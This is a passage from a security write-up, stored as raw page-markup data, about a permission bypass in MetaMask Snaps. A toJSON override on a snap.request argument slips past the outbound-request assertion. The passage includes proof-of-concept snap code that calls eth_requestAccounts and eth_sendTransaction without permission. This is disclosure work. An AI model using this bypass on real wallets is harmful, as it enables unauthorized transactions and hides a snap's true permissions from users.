(",{"type":25,"tag":82,"props":42627,"children":42629},{"className":42628},[],[42630],{"type":31,"value":42141},{"type":31,"value":1307},{"type":25,"tag":82,"props":42633,"children":42635},{"className":42634},[],[42636],{"type":31,"value":35379},{"type":31,"value":42638},") are built outside the SES container with a ",{"type":25,"tag":82,"props":42640,"children":42642},{"className":42641},[],[42643],{"type":31,"value":35455},{"type":31,"value":10409},{"type":25,"tag":162,"props":42646,"children":42649},{"href":42647,"rel":42648},"https://github.com/MetaMask/snaps/blob/main/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L437",[166],[42650],{"type":31,"value":35339},{"type":31,"value":1472},{"type":25,"tag":206,"props":42653,"children":42655},{"className":39893,"code":42654,"language":39895,"meta":7,"style":7},"  const request = async (args: RequestArguments) => {\n      assertSnapOutboundRequest(args); // or assertEthereumOutboundRequest(args);\n      const sanitizedArgs = getSafeJson(args);\n      this.notify({ method: 'OutboundRequest' });\n      try {\n        return await withTeardown(\n          originalRequest(sanitizedArgs as unknown as RequestArguments),\n          this as any,\n        );\n      } finally {\n        this.notify({ method: 'OutboundResponse' });\n      }\n    };\n",[42656],{"type":25,"tag":82,"props":42657,"children":42658},{"__ignoreMap":7},[42659,42706,42731,42764,42799,42811,42831,42869,42889,42896,42913,42946,42953],{"type":25,"tag":216,"props":42660,"children":42661},{"class":6922,"line":6923},[42662,42666,42670,42674,42678,42682,42686,42690,42694,42698,42702],{"type":25,"tag":216,"props":42663,"children":42664},{"style":6936},[42665],{"type":31,"value":40151},{"type":25,"tag":216,"props":42667,"children":42668},{"style":7047},[42669],{"type":31,"value":35344},{"type":25,"tag":216,"props":42671,"children":42672},{"style":6953},[42673],{"type":31,"value":6956},{"type":25,"tag":216,"props":42675,"children":42676},{"style":6936},[42677],{"type":31,"value":40328},{"type":25,"tag":216,"props":42679,"children":42680},{"style":6964},[42681],{"type":31,"value":7016},{"type":25,"tag":216,"props":42683,"children":42684},{"style":6947},[42685],{"type":31,"value":42191},{"type":25,"tag":216,"props":42687,"children":42688},{"style":6953},[42689],{"type":31,"value":1472},{"type":25,"tag":216,"props":42691,"children":42692},{"style":7375},[42693],{"type":31,"value":42200},{"type":25,"tag":216,"props":42695,"children":42696},{"style":6964},[42697],{"type":31,"value":7036},{"type":25,"tag":216,"props":42699,"children":42700},{"style":6936},[42701],{"type":31,"value":18779},{"type":25,"tag":216,"props":42703,"children":42704},{"style":6964},[42705],{"type":31,"value":7241},{"type":25,"tag":216,"props":42707,"children":42708},{"class":6922,"line":6769},[42709,42714,42718,42722,42726],{"type":25,"tag":216,"props":42710,"children":42711},{"style":7047},[42712],{"type":31,"value":42713},"      assertSnapOutboundRequest",{"type":25,"tag":216,"props":42715,"children":42716},{"style":6964},[42717],{"type":31,"value":1850},{"type":25,"tag":216,"props":42719,"children":42720},{"style":6947},[42721],{"type":31,"value":42191},{"type":25,"tag":216,"props":42723,"children":42724},{"style":6964},[42725],{"type":31,"value":32312},{"type":25,"tag":216,"props":42727,"children":42728},{"style":6927},[42729],{"type":31,"value":42730},"// or assertEthereumOutboundRequest(args);\n",{"type":25,"tag":216,"props":42732,"children":42733},{"class":6922,"line":6778},[42734,42738,42743,42747,42752,42756,42760],{"type":25,"tag":216,"props":42735,"children":42736},{"style":6936},[42737],{"type":31,"value":35509},{"type":25,"tag":216,"props":42739,"children":42740},{"style":6947},[42741],{"type":31,"value":42742}," sanitizedArgs",{"type":25,"tag":216,"props":42744,"children":42745},{"style":6953},[42746],{"type":31,"value":6956},{"type":25,"tag":216,"props":42748,"children":42749},{"style":7047},[42750],{"type":31,"value":42751}," getSafeJson",{"type":25,"tag":216,"props":42753,"children":42754},{"style":6964},[42755],{"type":31,"value":1850},{"type":25,"tag":216,"props":42757,"children":42758},{"style":6947},[42759],{"type":31,"value":42191},{"type":25,"tag":216,"props":42761,"children":42762},{"style":6964},[42763],{"type":31,"value":7797},{"type":25,"tag":216,"props":42765,"children":42766},{"class":6922,"line":7005},[42767,42772,42776,42781,42785,42789,42794],{"type":25,"tag":216,"props":42768,"children":42769},{"style":6936},[42770],{"type":31,"value":42771},"      this",{"type":25,"tag":216,"props":42773,"children":42774},{"style":6964},[42775],{"type":31,"value":179},{"type":25,"tag":216,"props":42777,"children":42778},{"style":7047},[42779],{"type":31,"value":42780},"notify",{"type":25,"tag":216,"props":42782,"children":42783},{"style":6964},[42784],{"type":31,"value":35460},{"type":25,"tag":216,"props":42786,"children":42787},{"style":6947},[42788],{"type":31,"value":35465},{"type":25,"tag":216,"props":42790,"children":42791},{"style":8205},[42792],{"type":31,"value":42793}," 'OutboundRequest'",{"type":25,"tag":216,"props":42795,"children":42796},{"style":6964},[42797],{"type":31,"value":42798}," });\n",{"type":25,"tag":216,"props":42800,"children":42801},{"class":6922,"line":7110},[42802,42807],{"type":25,"tag":216,"props":42803,"children":42804},{"style":6973},[42805],{"type":31,"value":42806},"      try",{"type":25,"tag":216,"props":42808,"children":42809},{"style":6964},[42810],{"type":31,"value":7241},{"type":25,"tag":216,"props":42812,"children":42813},{"class":6922,"line":7216},[42814,42818,42822,42827],{"type":25,"tag":216,"props":42815,"children":42816},{"style":6973},[42817],{"type":31,"value":19702},{"type":25,"tag":216,"props":42819,"children":42820},{"style":6973},[42821],{"type":31,"value":40174},{"type":25,"tag":216,"props":42823,"children":42824},{"style":7047},[42825],{"type":31,"value":42826}," withTeardown",{"type":25,"tag":216,"props":42828,"children":42829},{"style":6964},[42830],{"type":31,"value":7420},{"type":25,"tag":216,"props":42832,"children":42833},{"class":6922,"line":7244},[42834,42839,42843,42848,42852,42857,42861,42865],{"type":25,"tag":216,"props":42835,"children":42836},{"style":7047},[42837],{"type":31,"value":42838},"          originalRequest",{"type":25,"tag":216,"props":42840,"children":42841},{"style":6964},[42842],{"type":31,"value":1850},{"type":25,"tag":216,"props":42844,"children":42845},{"style":6947},[42846],{"type":31,"value":42847},"sanitizedArgs",{"type":25,"tag":216,"props":42849,"children":42850},{"style":6973},[42851],{"type":31,"value":12781},{"type":25,"tag":216,"props":42853,"children":42854},{"style":7375},[42855],{"type":31,"value":42856}," unknown",{"type":25,"tag":216,"props":42858,"children":42859},{"style":6973},[42860],{"type":31,"value":12781},{"type":25,"tag":216,"props":42862,"children":42863},{"style":7375},[42864],{"type":31,"value":42200},{"type":25,"tag":216,"props":42866,"children":42867},{"style":6964},[42868],{"type":31,"value":10688},{"type":25,"tag":216,"props":42870,"children":42871},{"class":6922,"line":7257},[42872,42877,42881,42885],{"type":25,"tag":216,"props":42873,"children":42874},{"style":6936},[42875],{"type":31,"value":42876},"          this",{"type":25,"tag":216,"props":42878,"children":42879},{"style":6973},[42880],{"type":31,"value":12781},{"type":25,"tag":216,"props":42882,"children":42883},{"style":7375},[42884],{"type":31,"value":14315},{"type":25,"tag":216,"props":42886,"children":42887},{"style":6964},[42888],{"type":31,"value":7465},{"type":25,"tag":216,"props":42890,"children":42891},{"class":6922,"line":7275},[42892],{"type":25,"tag":216,"props":42893,"children":42894},{"style":6964},[42895],{"type":31,"value":11695},{"type":25,"tag":216,"props":42897,"children":42898},{"class":6922,"line":7296},[42899,42904,42909],{"type":25,"tag":216,"props":42900,"children":42901},{"style":6964},[42902],{"type":31,"value":42903},"      } ",{"type":25,"tag":216,"props":42905,"children":42906},{"style":6973},[42907],{"type":31,"value":42908},"finally",{"type":25,"tag":216,"props":42910,"children":42911},{"style":6964},[42912],{"type":31,"value":7241},{"type":25,"tag":216,"props":42914,"children":42915},{"class":6922,"line":7305},[42916,42921,42925,42929,42933,42937,42942],{"type":25,"tag":216,"props":42917,"children":42918},{"style":6936},[42919],{"type":31,"value":42920},"        this",{"type":25,"tag":216,"props":42922,"children":42923},{"style":6964},[42924],{"type":31,"value":179},{"type":25,"tag":216,"props":42926,"children":42927},{"style":7047},[42928],{"type":31,"value":42780},{"type":25,"tag":216,"props":42930,"children":42931},{"style":6964},[42932],{"type":31,"value":35460},{"type":25,"tag":216,"props":42934,"children":42935},{"style":6947},[42936],{"type":31,"value":35465},{"type":25,"tag":216,"props":42938,"children":42939},{"style":8205},[42940],{"type":31,"value":42941}," 'OutboundResponse'",{"type":25,"tag":216,"props":42943,"children":42944},{"style":6964},[42945],{"type":31,"value":42798},{"type":25,"tag":216,"props":42947,"children":42948},{"class":6922,"line":7557},[42949],{"type":25,"tag":216,"props":42950,"children":42951},{"style":6964},[42952],{"type":31,"value":16620},{"type":25,"tag":216,"props":42954,"children":42955},{"class":6922,"line":7574},[42956],{"type":25,"tag":216,"props":42957,"children":42958},{"style":6964},[42959],{"type":31,"value":42960},"    };\n",{"type":25,"tag":38,"props":42962,"children":42963},{},[42964,42966,42971,42973,42978],{"type":31,"value":42965},"In particular, this function is from the ",{"type":25,"tag":82,"props":42967,"children":42969},{"className":42968},[],[42970],{"type":31,"value":42141},{"type":31,"value":42972}," provider, but the only thing that changes between this and ",{"type":25,"tag":82,"props":42974,"children":42976},{"className":42975},[],[42977],{"type":31,"value":35379},{"type":31,"value":42979}," is the assert function in the first line.",{"type":25,"tag":38,"props":42981,"children":42982},{},[42983],{"type":31,"value":42984},"As we can see in the code, the execution flow follows this pattern:",{"type":25,"tag":6711,"props":42986,"children":42987},{},[42988,43000,43005],{"type":25,"tag":2043,"props":42989,"children":42990},{},[42991,42993,42998],{"type":31,"value":42992},"Assert if ",{"type":25,"tag":82,"props":42994,"children":42996},{"className":42995},[],[42997],{"type":31,"value":42191},{"type":31,"value":42999}," are valid",{"type":25,"tag":2043,"props":43001,"children":43002},{},[43003],{"type":31,"value":43004},"getSafeJson to get sanitizedArgs",{"type":25,"tag":2043,"props":43006,"children":43007},{},[43008],{"type":31,"value":43009},"originalRequest(sanitizedArgs)",{"type":25,"tag":38,"props":43011,"children":43012},{},[43013,43015,43021],{"type":31,"value":43014},"Obs: ",{"type":25,"tag":82,"props":43016,"children":43018},{"className":43017},[],[43019],{"type":31,"value":43020},"originalRequest",{"type":31,"value":43022}," makes the RPC call to metamask service worker",{"type":25,"tag":606,"props":43024,"children":43026},{"id":43025},"safe-json-exploit",[43027],{"type":31,"value":43028},"Safe JSON Exploit",{"type":25,"tag":38,"props":43030,"children":43031},{},[43032,43034,43040,43042,43047,43049,43055],{"type":31,"value":43033},"As we dug further into the",{"type":25,"tag":82,"props":43035,"children":43037},{"className":43036},[],[43038],{"type":31,"value":43039},"getSafeJson",{"type":31,"value":43041}," function (defined in ",{"type":25,"tag":82,"props":43043,"children":43045},{"className":43044},[],[43046],{"type":31,"value":41259},{"type":31,"value":43048}," package) we discovered the following ",{"type":25,"tag":162,"props":43050,"children":43053},{"href":43051,"rel":43052},"https://github.com/MetaMask/utils/blob/7f0116d4d853d85319d200c503a2f9abc390f1d3/src/json.ts#L72",[166],[43054],{"type":31,"value":82},{"type":31,"value":1472},{"type":25,"tag":206,"props":43057,"children":43059},{"className":39576,"code":43058,"language":39578,"meta":7,"style":7},"export const JsonStruct = coerce(UnsafeJsonStruct, any(), (value) => {\n  assertStruct(value, UnsafeJsonStruct);\n  return JSON.parse(\n    JSON.stringify(value, (propKey, propValue) => {\n      // Strip __proto__ and constructor properties to prevent prototype pollution.\n      if (propKey === '__proto__' || propKey === 'constructor') {\n        return undefined;\n      }\n      return propValue;\n    }),\n  );\n});\n",[43060],{"type":25,"tag":82,"props":43061,"children":43062},{"__ignoreMap":7},[43063,43128,43155,43180,43235,43243,43290,43306,43313,43330,43337,43344],{"type":25,"tag":216,"props":43064,"children":43065},{"class":6922,"line":6923},[43066,43070,43075,43080,43084,43089,43093,43098,43102,43106,43111,43116,43120,43124],{"type":25,"tag":216,"props":43067,"children":43068},{"style":6973},[43069],{"type":31,"value":42172},{"type":25,"tag":216,"props":43071,"children":43072},{"style":6936},[43073],{"type":31,"value":43074}," const",{"type":25,"tag":216,"props":43076,"children":43077},{"style":6947},[43078],{"type":31,"value":43079}," JsonStruct",{"type":25,"tag":216,"props":43081,"children":43082},{"style":6953},[43083],{"type":31,"value":6956},{"type":25,"tag":216,"props":43085,"children":43086},{"style":7047},[43087],{"type":31,"value":43088}," coerce",{"type":25,"tag":216,"props":43090,"children":43091},{"style":6964},[43092],{"type":31,"value":1850},{"type":25,"tag":216,"props":43094,"children":43095},{"style":6947},[43096],{"type":31,"value":43097},"UnsafeJsonStruct",{"type":25,"tag":216,"props":43099,"children":43100},{"style":6964},[43101],{"type":31,"value":7026},{"type":25,"tag":216,"props":43103,"children":43104},{"style":7047},[43105],{"type":31,"value":20671},{"type":25,"tag":216,"props":43107,"children":43108},{"style":6964},[43109],{"type":31,"value":43110},"(), (",{"type":25,"tag":216,"props":43112,"children":43113},{"style":6947},[43114],{"type":31,"value":43115},"value",{"type":25,"tag":216,"props":43117,"children":43118},{"style":6964},[43119],{"type":31,"value":7036},{"type":25,"tag":216,"props":43121,"children":43122},{"style":6936},[43123],{"type":31,"value":18779},{"type":25,"tag":216,"props":43125,"children":43126},{"style":6964},[43127],{"type":31,"value":7241},{"type":25,"tag":216,"props":43129,"children":43130},{"class":6922,"line":6769},[43131,43135,43139,43143,43147,43151],{"type":25,"tag":216,"props":43132,"children":43133},{"style":7047},[43134],{"type":31,"value":42523},{"type":25,"tag":216,"props":43136,"children":43137},{"style":6964},[43138],{"type":31,"value":1850},{"type":25,"tag":216,"props":43140,"children":43141},{"style":6947},[43142],{"type":31,"value":43115},{"type":25,"tag":216,"props":43144,"children":43145},{"style":6964},[43146],{"type":31,"value":7026},{"type":25,"tag":216,"props":43148,"children":43149},{"style":6947},[43150],{"type":31,"value":43097},{"type":25,"tag":216,"props":43152,"children":43153},{"style":6964},[43154],{"type":31,"value":7797},{"type":25,"tag":216,"props":43156,"children":43157},{"class":6922,"line":6778},[43158,43163,43167,43171,43176],{"type":25,"tag":216,"props":43159,"children":43160},{"style":6973},[43161],{"type":31,"value":43162},"  return",{"type":25,"tag":216,"props":43164,"children":43165},{"style":6947},[43166],{"type":31,"value":41491},{"type":25,"tag":216,"props":43168,"children":43169},{"style":6964},[43170],{"type":31,"value":179},{"type":25,"tag":216,"props":43172,"children":43173},{"style":7047},[43174],{"type":31,"value":43175},"parse",{"type":25,"tag":216,"props":43177,"children":43178},{"style":6964},[43179],{"type":31,"value":7420},{"type":25,"tag":216,"props":43181,"children":43182},{"class":6922,"line":7005},[43183,43188,43192,43197,43201,43205,43209,43214,43218,43223,43227,43231],{"type":25,"tag":216,"props":43184,"children":43185},{"style":6947},[43186],{"type":31,"value":43187},"    JSON",{"type":25,"tag":216,"props":43189,"children":43190},{"style":6964},[43191],{"type":31,"value":179},{"type":25,"tag":216,"props":43193,"children":43194},{"style":7047},[43195],{"type":31,"value":43196},"stringify",{"type":25,"tag":216,"props":43198,"children":43199},{"style":6964},[43200],{"type":31,"value":1850},{"type":25,"tag":216,"props":43202,"children":43203},{"style":6947},[43204],{"type":31,"value":43115},{"type":25,"tag":216,"props":43206,"children":43207},{"style":6964},[43208],{"type":31,"value":12772},{"type":25,"tag":216,"props":43210,"children":43211},{"style":6947},[43212],{"type":31,"value":43213},"propKey",{"type":25,"tag":216,"props":43215,"children":43216},{"style":6964},[43217],{"type":31,"value":7026},{"type":25,"tag":216,"props":43219,"children":43220},{"style":6947},[43221],{"type":31,"value":43222},"propValue",{"type":25,"tag":216,"props":43224,"children":43225},{"style":6964},[43226],{"type":31,"value":7036},{"type":25,"tag":216,"props":43228,"children":43229},{"style":6936},[43230],{"type":31,"value":18779},{"type":25,"tag":216,"props":43232,"children":43233},{"style":6964},[43234],{"type":31,"value":7241},{"type":25,"tag":216,"props":43236,"children":43237},{"class":6922,"line":7110},[43238],{"type":25,"tag":216,"props":43239,"children":43240},{"style":6927},[43241],{"type":31,"value":43242},"      // Strip __proto__ and constructor properties to prevent prototype pollution.\n",{"type":25,"tag":216,"props":43244,"children":43245},{"class":6922,"line":7216},[43246,43251,43255,43259,43263,43268,43272,43277,43281,43286],{"type":25,"tag":216,"props":43247,"children":43248},{"style":6973},[43249],{"type":31,"value":43250},"      if",{"type":25,"tag":216,"props":43252,"children":43253},{"style":6964},[43254],{"type":31,"value":7016},{"type":25,"tag":216,"props":43256,"children":43257},{"style":6947},[43258],{"type":31,"value":43213},{"type":25,"tag":216,"props":43260,"children":43261},{"style":6953},[43262],{"type":31,"value":35384},{"type":25,"tag":216,"props":43264,"children":43265},{"style":8205},[43266],{"type":31,"value":43267}," '__proto__'",{"type":25,"tag":216,"props":43269,"children":43270},{"style":6953},[43271],{"type":31,"value":27654},{"type":25,"tag":216,"props":43273,"children":43274},{"style":6947},[43275],{"type":31,"value":43276}," propKey",{"type":25,"tag":216,"props":43278,"children":43279},{"style":6953},[43280],{"type":31,"value":35384},{"type":25,"tag":216,"props":43282,"children":43283},{"style":8205},[43284],{"type":31,"value":43285}," 'constructor'",{"type":25,"tag":216,"props":43287,"children":43288},{"style":6964},[43289],{"type":31,"value":18761},{"type":25,"tag":216,"props":43291,"children":43292},{"class":6922,"line":7244},[43293,43297,43302],{"type":25,"tag":216,"props":43294,"children":43295},{"style":6973},[43296],{"type":31,"value":19702},{"type":25,"tag":216,"props":43298,"children":43299},{"style":6936},[43300],{"type":31,"value":43301}," undefined",{"type":25,"tag":216,"props":43303,"children":43304},{"style":6964},[43305],{"type":31,"value":6967},{"type":25,"tag":216,"props":43307,"children":43308},{"class":6922,"line":7257},[43309],{"type":25,"tag":216,"props":43310,"children":43311},{"style":6964},[43312],{"type":31,"value":16620},{"type":25,"tag":216,"props":43314,"children":43315},{"class":6922,"line":7275},[43316,43321,43326],{"type":25,"tag":216,"props":43317,"children":43318},{"style":6973},[43319],{"type":31,"value":43320},"      return",{"type":25,"tag":216,"props":43322,"children":43323},{"style":6947},[43324],{"type":31,"value":43325}," propValue",{"type":25,"tag":216,"props":43327,"children":43328},{"style":6964},[43329],{"type":31,"value":6967},{"type":25,"tag":216,"props":43331,"children":43332},{"class":6922,"line":7296},[43333],{"type":25,"tag":216,"props":43334,"children":43335},{"style":6964},[43336],{"type":31,"value":42508},{"type":25,"tag":216,"props":43338,"children":43339},{"class":6922,"line":7305},[43340],{"type":25,"tag":216,"props":43341,"children":43342},{"style":6964},[43343],{"type":31,"value":42375},{"type":25,"tag":216,"props":43345,"children":43346},{"class":6922,"line":7557},[43347],{"type":25,"tag":216,"props":43348,"children":43349},{"style":6964},[43350],{"type":31,"value":39301},{"type":25,"tag":38,"props":43352,"children":43353},{},[43354,43356,43362,43364,43369,43371,43377,43379,43385],{"type":31,"value":43355},"The function performs a ",{"type":25,"tag":82,"props":43357,"children":43359},{"className":43358},[],[43360],{"type":31,"value":43361},"JSON.parse(JSON.stringify(value))",{"type":31,"value":43363}," in the argument sent to ",{"type":25,"tag":82,"props":43365,"children":43367},{"className":43366},[],[43368],{"type":31,"value":43039},{"type":31,"value":43370},". This specific function is how we found a way to exploit the assertion limitations. The bypass is made by setting a ",{"type":25,"tag":82,"props":43372,"children":43374},{"className":43373},[],[43375],{"type":31,"value":43376},"toJSON",{"type":31,"value":43378}," function in a legit ",{"type":25,"tag":82,"props":43380,"children":43382},{"className":43381},[],[43383],{"type":31,"value":43384},"snap.request",{"type":31,"value":43386}," argument:",{"type":25,"tag":6711,"props":43388,"children":43389},{},[43390,43395,43400],{"type":25,"tag":2043,"props":43391,"children":43392},{},[43393],{"type":31,"value":43394},"assertSnapOutboundRequest(args) -> pass the assertion",{"type":25,"tag":2043,"props":43396,"children":43397},{},[43398],{"type":31,"value":43399},"sanitizedArgs = getSafeJson(args) -> toJSON returns a malicious object",{"type":25,"tag":2043,"props":43401,"children":43402},{},[43403],{"type":31,"value":43404},"originalRequest(sanitizedArgs) -> forwards the malicious object",{"type":25,"tag":38,"props":43406,"children":43407},{},[43408],{"type":31,"value":43409},"The assertion bypass can be useful on two occasions:",{"type":25,"tag":6711,"props":43411,"children":43412},{},[43413,43418],{"type":25,"tag":2043,"props":43414,"children":43415},{},[43416],{"type":31,"value":43417},"forward blocked RPC methods",{"type":25,"tag":2043,"props":43419,"children":43420},{},[43421,43423,43428,43430,43436,43438,43443],{"type":31,"value":43422},"Making requests in ",{"type":25,"tag":82,"props":43424,"children":43426},{"className":43425},[],[43427],{"type":31,"value":43384},{"type":31,"value":43429}," that were only supposed to be done within ",{"type":25,"tag":82,"props":43431,"children":43433},{"className":43432},[],[43434],{"type":31,"value":43435},"ethereum.request",{"type":31,"value":43437}," (with ",{"type":25,"tag":82,"props":43439,"children":43441},{"className":43440},[],[43442],{"type":31,"value":42612},{"type":31,"value":43444}," enabled).",{"type":25,"tag":38,"props":43446,"children":43447},{},[43448],{"type":31,"value":43449},"This particular vulnerability allows the snap to perform ethereum requests without permissions.",{"type":25,"tag":606,"props":43451,"children":43452},{"id":9612},[43453],{"type":31,"value":9615},{"type":25,"tag":38,"props":43455,"children":43456},{},[43457],{"type":31,"value":43458},"The bypass we described may be used to mislead the allowed permissions of the snap. This can cause the snap installation confirmation popup not to display the actual permissions of the snap. This exploit allows the snap to unexpectedly propose malicious transactions to the user, which shouldn't be possible, even with permissions according to the documentation.",{"type":25,"tag":38,"props":43460,"children":43461},{},[43462],{"type":25,"tag":6467,"props":43463,"children":43465},{"alt":7,"src":43464},"/posts/metamask-snaps/note.png",[],{"type":25,"tag":606,"props":43467,"children":43469},{"id":43468},"proof-of-concept",[43470],{"type":31,"value":38792},{"type":25,"tag":38,"props":43472,"children":43473},{},[43474,43476,43481,43483,43488,43490,43496],{"type":31,"value":43475},"To demonstrate the issue, we created a snap without the ",{"type":25,"tag":82,"props":43477,"children":43479},{"className":43478},[],[43480],{"type":31,"value":42612},{"type":31,"value":43482}," permission, and used the ",{"type":25,"tag":82,"props":43484,"children":43486},{"className":43485},[],[43487],{"type":31,"value":42141},{"type":31,"value":43489}," interface to call ",{"type":25,"tag":82,"props":43491,"children":43493},{"className":43492},[],[43494],{"type":31,"value":43495},"eth_sendTransaction",{"type":31,"value":43497},". According to the documentation, this shouldn't be possible:",{"type":25,"tag":206,"props":43499,"children":43501},{"className":39576,"code":43500,"language":39578,"meta":7,"style":7},"import { OnRpcRequestHandler } from '@metamask/snaps-types';\n\n\nfunction jsonExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_requestAccounts\",\n      params: []\n    }\n  }\n\n  return snap.request(x)\n\n}\n\nfunction transactionExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_sendTransaction\",\n      params: [{\n        from: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\", // change this to your address\n        to: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\",\n        value: \"0x1\",\n      }]\n    }\n  }\n\n  return snap.request(x);\n}\n\nexport const onRpcRequest: OnRpcRequestHandler = ({ origin, request }) => {\n\n  switch (request.method) {\n    case 'json':\n      return jsonExploit();\n    case 'transaction':\n      return transactionExploit();\n    default:\n      throw new Error('Method not found.');\n  }\n};\n",[43502],{"type":25,"tag":82,"props":43503,"children":43504},{"__ignoreMap":7},[43505,43538,43545,43552,43569,43598,43605,43630,43637,43669,43680,43697,43710,43717,43724,43731,43763,43770,43777,43784,43800,43827,43834,43857,43864,43895,43906,43922,43934,43955,43970,43987,43995,44002,44009,44016,44047,44054,44061,44121,44128,44156,44173,44188,44204,44219,44231,44261,44268],{"type":25,"tag":216,"props":43506,"children":43507},{"class":6922,"line":6923},[43508,43512,43516,43521,43525,43529,43534],{"type":25,"tag":216,"props":43509,"children":43510},{"style":6973},[43511],{"type":31,"value":23443},{"type":25,"tag":216,"props":43513,"children":43514},{"style":6964},[43515],{"type":31,"value":13542},{"type":25,"tag":216,"props":43517,"children":43518},{"style":6947},[43519],{"type":31,"value":43520},"OnRpcRequestHandler",{"type":25,"tag":216,"props":43522,"children":43523},{"style":6964},[43524],{"type":31,"value":40165},{"type":25,"tag":216,"props":43526,"children":43527},{"style":6973},[43528],{"type":31,"value":23433},{"type":25,"tag":216,"props":43530,"children":43531},{"style":8205},[43532],{"type":31,"value":43533}," '@metamask/snaps-types'",{"type":25,"tag":216,"props":43535,"children":43536},{"style":6964},[43537],{"type":31,"value":6967},{"type":25,"tag":216,"props":43539,"children":43540},{"class":6922,"line":6769},[43541],{"type":25,"tag":216,"props":43542,"children":43543},{"emptyLinePlaceholder":16},[43544],{"type":31,"value":7642},{"type":25,"tag":216,"props":43546,"children":43547},{"class":6922,"line":6778},[43548],{"type":25,"tag":216,"props":43549,"children":43550},{"emptyLinePlaceholder":16},[43551],{"type":31,"value":7642},{"type":25,"tag":216,"props":43553,"children":43554},{"class":6922,"line":7005},[43555,43559,43564],{"type":25,"tag":216,"props":43556,"children":43557},{"style":6936},[43558],{"type":31,"value":35339},{"type":25,"tag":216,"props":43560,"children":43561},{"style":7047},[43562],{"type":31,"value":43563}," jsonExploit",{"type":25,"tag":216,"props":43565,"children":43566},{"style":6964},[43567],{"type":31,"value":43568},"(){\n",{"type":25,"tag":216,"props":43570,"children":43571},{"class":6922,"line":7110},[43572,43576,43580,43584,43589,43593],{"type":25,"tag":216,"props":43573,"children":43574},{"style":6936},[43575],{"type":31,"value":11807},{"type":25,"tag":216,"props":43577,"children":43578},{"style":6947},[43579],{"type":31,"value":23025},{"type":25,"tag":216,"props":43581,"children":43582},{"style":6953},[43583],{"type":31,"value":6956},{"type":25,"tag":216,"props":43585,"children":43586},{"style":6964},[43587],{"type":31,"value":43588}," [] ",{"type":25,"tag":216,"props":43590,"children":43591},{"style":6973},[43592],{"type":31,"value":12795},{"type":25,"tag":216,"props":43594,"children":43595},{"style":7375},[43596],{"type":31,"value":43597}," any\n",{"type":25,"tag":216,"props":43599,"children":43600},{"class":6922,"line":7216},[43601],{"type":25,"tag":216,"props":43602,"children":43603},{"emptyLinePlaceholder":16},[43604],{"type":31,"value":7642},{"type":25,"tag":216,"props":43606,"children":43607},{"class":6922,"line":7244},[43608,43613,43617,43621,43625],{"type":25,"tag":216,"props":43609,"children":43610},{"style":6947},[43611],{"type":31,"value":43612},"  x",{"type":25,"tag":216,"props":43614,"children":43615},{"style":6964},[43616],{"type":31,"value":179},{"type":25,"tag":216,"props":43618,"children":43619},{"style":6947},[43620],{"type":31,"value":42276},{"type":25,"tag":216,"props":43622,"children":43623},{"style":6953},[43624],{"type":31,"value":6956},{"type":25,"tag":216,"props":43626,"children":43627},{"style":8205},[43628],{"type":31,"value":43629}," \"snap_dialog\"\n",{"type":25,"tag":216,"props":43631,"children":43632},{"class":6922,"line":7257},[43633],{"type":25,"tag":216,"props":43634,"children":43635},{"emptyLinePlaceholder":16},[43636],{"type":31,"value":7642},{"type":25,"tag":216,"props":43638,"children":43639},{"class":6922,"line":7275},[43640,43644,43648,43652,43656,43661,43665],{"type":25,"tag":216,"props":43641,"children":43642},{"style":6947},[43643],{"type":31,"value":43612},{"type":25,"tag":216,"props":43645,"children":43646},{"style":6964},[43647],{"type":31,"value":179},{"type":25,"tag":216,"props":43649,"children":43650},{"style":7047},[43651],{"type":31,"value":43376},{"type":25,"tag":216,"props":43653,"children":43654},{"style":6953},[43655],{"type":31,"value":6956},{"type":25,"tag":216,"props":43657,"children":43658},{"style":6964},[43659],{"type":31,"value":43660}," () ",{"type":25,"tag":216,"props":43662,"children":43663},{"style":6936},[43664],{"type":31,"value":18779},{"type":25,"tag":216,"props":43666,"children":43667},{"style":6964},[43668],{"type":31,"value":7241},{"type":25,"tag":216,"props":43670,"children":43671},{"class":6922,"line":7296},[43672,43676],{"type":25,"tag":216,"props":43673,"children":43674},{"style":6973},[43675],{"type":31,"value":20947},{"type":25,"tag":216,"props":43677,"children":43678},{"style":6964},[43679],{"type":31,"value":7241},{"type":25,"tag":216,"props":43681,"children":43682},{"class":6922,"line":7305},[43683,43688,43693],{"type":25,"tag":216,"props":43684,"children":43685},{"style":6947},[43686],{"type":31,"value":43687},"      method:",{"type":25,"tag":216,"props":43689,"children":43690},{"style":8205},[43691],{"type":31,"value":43692}," \"eth_requestAccounts\"",{"type":25,"tag":216,"props":43694,"children":43695},{"style":6964},[43696],{"type":31,"value":7465},{"type":25,"tag":216,"props":43698,"children":43699},{"class":6922,"line":7557},[43700,43705],{"type":25,"tag":216,"props":43701,"children":43702},{"style":6947},[43703],{"type":31,"value":43704},"      params:",{"type":25,"tag":216,"props":43706,"children":43707},{"style":6964},[43708],{"type":31,"value":43709}," []\n",{"type":25,"tag":216,"props":43711,"children":43712},{"class":6922,"line":7574},[43713],{"type":25,"tag":216,"props":43714,"children":43715},{"style":6964},[43716],{"type":31,"value":7311},{"type":25,"tag":216,"props":43718,"children":43719},{"class":6922,"line":7591},[43720],{"type":25,"tag":216,"props":43721,"children":43722},{"style":6964},[43723],{"type":31,"value":9823},{"type":25,"tag":216,"props":43725,"children":43726},{"class":6922,"line":7604},[43727],{"type":25,"tag":216,"props":43728,"children":43729},{"emptyLinePlaceholder":16},[43730],{"type":31,"value":7642},{"type":25,"tag":216,"props":43732,"children":43733},{"class":6922,"line":7613},[43734,43738,43743,43747,43751,43755,43759],{"type":25,"tag":216,"props":43735,"children":43736},{"style":6973},[43737],{"type":31,"value":43162},{"type":25,"tag":216,"props":43739,"children":43740},{"style":6947},[43741],{"type":31,"value":43742}," 